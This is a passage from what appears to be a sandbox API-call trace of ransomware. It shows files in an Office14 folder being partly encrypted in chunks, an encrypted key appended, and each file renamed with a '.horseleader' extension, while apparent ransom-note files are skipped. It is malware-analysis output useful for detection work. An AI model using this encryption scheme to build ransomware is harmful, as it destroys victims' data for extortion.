nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.196] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb2ba8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.196] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.198] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.199] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.199] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.199] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.199] CloseHandle (hObject=0x158) returned 1 [0245.199] GetProcessHeap () returned 0x780000 [0245.199] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.199] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.horseleader") returned 84 [0245.199] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJ11OD11.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pj11od11.dll.horseleader")) returned 1 [0245.201] GetProcessHeap () returned 0x780000 [0245.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.201] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a461000, ftCreationTime.dwHighDateTime=0x1cb7018, ftLastAccessTime.dwLowDateTime=0xe5d47680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9a461000, ftLastWriteTime.dwHighDateTime=0x1cb7018, nFileSizeHigh=0x0, nFileSizeLow=0x3fb90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PJRESC.DLL", cAlternateFileName="")) returned 1 [0245.201] lstrcmpiW (lpString1="PJRESC.DLL", lpString2="Windows") returned -1 [0245.201] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0245.201] StrStrIW (lpFirst="PJRESC.DLL", lpSrch=".horseleader") returned 0x0 [0245.201] lstrcmpW (lpString1="PJRESC.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.201] lstrcmpW (lpString1="PJRESC.DLL", lpString2="_uninstalling_.png") returned 1 [0245.201] lstrlenW (lpString=".testttjffg") returned 11 [0245.201] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL", lpSrch=".testttjffg") returned 0x0 [0245.201] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.201] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL") returned 70 [0245.202] StrStrW (lpFirst="PJRESC.DLL", lpSrch=".txt") returned 0x0 [0245.202] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=261008) returned 1 [0245.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.203] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.205] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.206] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1d5c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.207] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.208] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.208] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3ab90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.208] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.210] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.211] CloseHandle (hObject=0x158) returned 1 [0245.211] GetProcessHeap () returned 0x780000 [0245.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 
[0245.211] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL.horseleader") returned 82 [0245.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PJRESC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\pjresc.dll.horseleader")) returned 1 [0245.212] GetProcessHeap () returned 0x780000 [0245.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.212] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74bd800, ftCreationTime.dwHighDateTime=0x1cb71c8, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x74bd800, ftLastWriteTime.dwHighDateTime=0x1cb71c8, nFileSizeHigh=0x0, nFileSizeLow=0x3c2b90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PRJRES.DLL", cAlternateFileName="")) returned 1 [0245.212] lstrcmpiW (lpString1="PRJRES.DLL", lpString2="Windows") returned -1 [0245.213] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0245.213] StrStrIW (lpFirst="PRJRES.DLL", lpSrch=".horseleader") returned 0x0 [0245.213] lstrcmpW (lpString1="PRJRES.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.213] lstrcmpW (lpString1="PRJRES.DLL", lpString2="_uninstalling_.png") returned 1 [0245.213] lstrlenW (lpString=".testttjffg") returned 11 [0245.213] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL", 
lpSrch=".testttjffg") returned 0x0 [0245.213] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.213] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.215] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL") returned 70 [0245.215] StrStrW (lpFirst="PRJRES.DLL", lpSrch=".txt") returned 0x0 [0245.215] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3943312) returned 1 [0245.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.215] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.218] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.218] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.219] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1dedc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.220] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3bdb90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.223] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.227] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.227] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.227] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, 
lpOverlapped=0x0) returned 1 [0245.227] CloseHandle (hObject=0x158) returned 1 [0245.228] GetProcessHeap () returned 0x780000 [0245.228] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.228] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.horseleader") returned 82 [0245.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.horseleader")) returned 1 [0245.229] GetProcessHeap () returned 0x780000 [0245.229] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.229] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a199a00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xdac16060, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a199a00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x1c8b68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RICHED20.DLL", cAlternateFileName="")) returned 1 [0245.229] lstrcmpiW (lpString1="RICHED20.DLL", lpString2="Windows") returned -1 [0245.229] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0245.229] StrStrIW (lpFirst="RICHED20.DLL", lpSrch=".horseleader") returned 0x0 [0245.229] lstrcmpW (lpString1="RICHED20.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.229] lstrcmpW 
(lpString1="RICHED20.DLL", lpString2="_uninstalling_.png") returned 1 [0245.229] lstrlenW (lpString=".testttjffg") returned 11 [0245.229] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL", lpSrch=".testttjffg") returned 0x0 [0245.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.230] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.230] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 72 [0245.231] StrStrW (lpFirst="RICHED20.DLL", lpSrch=".txt") returned 0x0 [0245.231] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1870696) returned 1 [0245.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.231] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.234] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.234] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xe1db4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1c3b68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.241] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.241] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.242] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.242] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.243] CloseHandle (hObject=0x158) returned 1 [0245.243] GetProcessHeap () returned 0x780000 [0245.243] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0245.243] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.horseleader") returned 84 [0245.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.horseleader")) returned 1 [0245.245] GetProcessHeap () returned 0x780000 [0245.245] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0245.245] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7339ac00, ftCreationTime.dwHighDateTime=0x1cbdfc2, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7339ac00, ftLastWriteTime.dwHighDateTime=0x1cbdfc2, nFileSizeHigh=0x0, nFileSizeLow=0x90778, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SERCONV.DLL", cAlternateFileName="")) returned 1 [0245.245] lstrcmpiW (lpString1="SERCONV.DLL", lpString2="Windows") returned -1 [0245.245] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0245.245] StrStrIW (lpFirst="SERCONV.DLL", lpSrch=".horseleader") returned 0x0 [0245.245] lstrcmpW (lpString1="SERCONV.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.245] lstrcmpW (lpString1="SERCONV.DLL", lpString2="_uninstalling_.png") returned 1 [0245.245] lstrlenW (lpString=".testttjffg") returned 11 [0245.245] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL", lpSrch=".testttjffg") returned 0x0 [0245.245] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.245] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\serconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\SERCONV.DLL") returned 71 [0245.247] StrStrW (lpFirst="SERCONV.DLL", lpSrch=".txt") returned 0x0 [0245.247] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=591736) returned 1 [0245.247] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.247] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.250] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.250] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.251] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x45bbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.251] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.254] WriteFile (in: 